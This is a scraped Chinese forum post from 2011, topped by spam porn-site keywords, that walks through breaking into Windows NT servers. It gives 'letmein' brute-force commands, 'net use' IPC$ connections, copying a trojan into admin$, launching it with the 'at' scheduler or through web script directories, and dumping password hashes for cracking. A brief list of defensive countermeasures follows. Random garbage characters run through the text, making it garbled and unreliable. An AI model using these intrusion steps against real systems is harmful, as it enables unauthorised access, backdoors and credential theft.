免费97视频在线精品国自产拍|亚洲就去吻婷婷永久网|香蕉视观看在线a|日本精品AⅤ在线观看

<dl id="aauvq"></dl>
<blockquote id="aauvq"></blockquote>
<thead id="aauvq"></thead>

<dl id="aauvq"><noframes id="aauvq"></noframes></dl>

           找回密碼
           注冊

          QQ登錄

          只需一步,快速開始

          遠程入侵NT ----spp(低音炮)

          [復制鏈接]
          1#
          發(fā)表于 2011-1-12 16:31:02 | 只看該作者 |倒序瀏覽 |閱讀模式
          看了篇文章介紹使用netbus 或 netspy 遠程入侵nt系統(tǒng),感覺真是。??磥韓t系統(tǒng)的共享機制如果不配合火墻使用,SMB會給你造成很大麻煩。。 連小小 只的木馬都可以讓nt管理員頭大。
          , B! J  a- M: ]" a5 p# I    其攻擊過程如下: 6 L/ J& K# [! s
          1、使用掃描工具查找NT主機       ' ]. w5 t6 {; K, B1 F9 d- C7 h
          2 、確定攻擊目標后,使用letmein 對目標主機進行攻擊, 如:
          : }5 z0 R1 e; Dletmein file://x.x.x.x/ -all -g mypwd (對\\x.x.x.x上所有用戶攻擊)
          6 a: Z% _# U$ G( j0 Q1 i* Q/ oletmein file://x.x.x.x/ -admin -g mypwd (對\\x.x.x.x上管理員攻擊) 8 s, s& b$ a% D8 m( _4 o
          letmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶)
          9 a/ ], T$ e7 B& g1 ]3 i% Q: O4 u注:- 確定目標后,收集目標信息并嘗試取得非法資源 / d6 I1 k( |/ D  F5 k1 i
          3、當letmein 獲取相關管理員權限后,使用ms提供的合法命令: , J9 G& w* |1 L6 d; e2 _
          net use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠程資源并將木馬拷入遠程
          # [0 x/ u- ?) E% O+ `5 Fcopy x:\netserver.exe \\x.x.x.x\admin$\system32
          , }& u# F, b' d, [; F4、使用合法ms命令遠程啟動木馬服務:
          * a- C" q; \+ t$ Enetsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg ; ?" [. s- J% D' C( e1 m* X& ]
          5 v( R) H5 V' y. ^/ h
             該方法有其巧妙之處。。利用nt的任務計劃管理,在特定時候啟動木馬服務   Y4 |( @8 u5 q
          # z: L0 `" p& F: {
             另一種方法: ! h2 e2 j1 v3 ?, r5 `  g
             將ntsrver.exe 或其他運行程序Copy到目的服務器的www可執(zhí)行目錄, 如cgi-bin或scripts,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務將被啟動
          ) x" i) J* [  s0 N- ]* L' ^2 T2 R# O1 x3 w
              到此,該次攻擊可以算成功了,遠程資源已在別人控制下。
          $ L# |9 y+ ~! {, h$ e: w    如果在遠程使用app redirect 啟動一個cmd.exe到特定端口 , 那么你可以telnet 到該端口,更方便使用該遠程資源 。比如:使用pwdump 將遠程nt上所有用戶和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來運算。 分析該次攻擊的整體過程,不難看出,關鍵步驟是letmein取得admin權限,但是很不幸,就目前廈門(有些是省內)的nt服務器管理員而言,密碼對letmein只是多花幾分鐘而已。我對某些大的公共平臺服務器進行掃描的結果,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上。而且在這些被進入的機器上,SMB都有在tcp/ip上 跑,有兩臺有配備火墻,但是沒有封閉對外137-139口。 2 _1 y" v( S  g- ]7 F
          3 O6 C+ H" |8 ]3 G
               對策:
          % A( v' q7 y* _  v1、還是老話,密碼的選擇問題,使用向..@2KjsfiM7v!09..這樣的密碼會讓任何使用 暴力法計算的機器算到cpu燒掉。 2 t) h' J3 u( V5 \
          2、nt網(wǎng)絡的適當配置,不要在對外的nc綁定共享服務是個好習慣,特別是tcp/ip協(xié)議。
          0 K2 h* v: l* o! s1 ^3、防火墻的配置,屏蔽一切不需要的服務端口,象netebui在tcp/ip上的137-139口,開這些口只會使你的系統(tǒng)處于危險的處境,如果非要在遠程使用這些口的服務,建議使用其他軟件來代替。
          + U7 ]# V3 B. Y3 \7 }7 o4、及時檢查日記和監(jiān)控服務的運行,定時對文件系統(tǒng)的權限受托關系進行檢查。
          " _# g! G1 f$ b! ?# e5、管理人員素質的提高,安全風險意思加強無疑對你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時不刻在影響著你 。" }% }  K$ [, ~: ]8 z1 F
          您需要登錄后才可以回帖 登錄 | 注冊

          本版積分規(guī)則

          QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

          GMT+8, 2025-5-4 00:18

          Powered by Discuz! X3.5

          © 2001-2025 Discuz! Team.

          快速回復 返回頂部 返回列表